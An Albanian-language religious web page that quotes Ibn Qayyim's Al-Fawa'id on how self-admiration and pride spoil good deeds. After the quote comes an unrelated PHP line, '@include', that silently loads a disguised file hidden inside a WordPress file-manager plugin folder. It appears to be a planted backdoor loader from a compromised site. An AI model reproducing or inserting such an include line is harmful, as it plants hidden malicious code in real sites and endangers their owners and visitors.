Sexta-feira, 12/4/2024 | : : UTC+0
Mjeksia Islame
United States
+11C

Marre nga libri Ibn Kajjimit

Marre nga libri Ibn Kajjimit

nature seaKa thene Ibn Kajimi, All-llahu e meshirofte:” Nuk ka diçka me asgjesues per veprat se sa vetepelqimi dhe shikimi i vetvetes, kur All-llahu ia do te miren e ben ta shohe miresine dhe ndihmen e Tij per te ne çdo gje çfare e flet dhe e vepron, nuk mahnitet me te, pastaj e ben ta shohe mangësine e tij ne ato dhe nuk kenaqet me ato (vepra të mangeta) per Zotin e tij, andaj pendohet tek Ai nga ato, kerkon falje dhe turperohet qe te kerkoje per ato shperblim.Nese nuk e ben ta sheh kete, ia fsheh keto dhe ai e shikon veten në pune, e shikon me sy të persosmerise dhe kenaqesise, prandaj kjo veper nuk eshte e pranuar e as per kenaqesine e Tij dhe dashurine per Te, i dituri punon pune duke shikuar ne te ndihmen, suksesin, miresinë e Tij (Allahut), kerkues falje, i turperuar nga Ai ngase nuk e ka plotesuar obligimin ndaj Tij, kurse injoranti punon pune per vete dhe epshin e tij, duke shikuar ne vetveten e tij, lavderohet me te para Zotit te tij, i kenaqur me punen e tij, andaj kjo eshte nje ngjyre e ajo tjetra ngjyre tjetër. [Marre nga libri ibn kajjimit Allahu e meshirofte,El-Fauaid faqe.153].

Pershtati Suad shabani
Medine el munevere

@include "wp-content/plugins/wp-file-manager/lib/codemirror/mode/eiffel/include/7260.ed";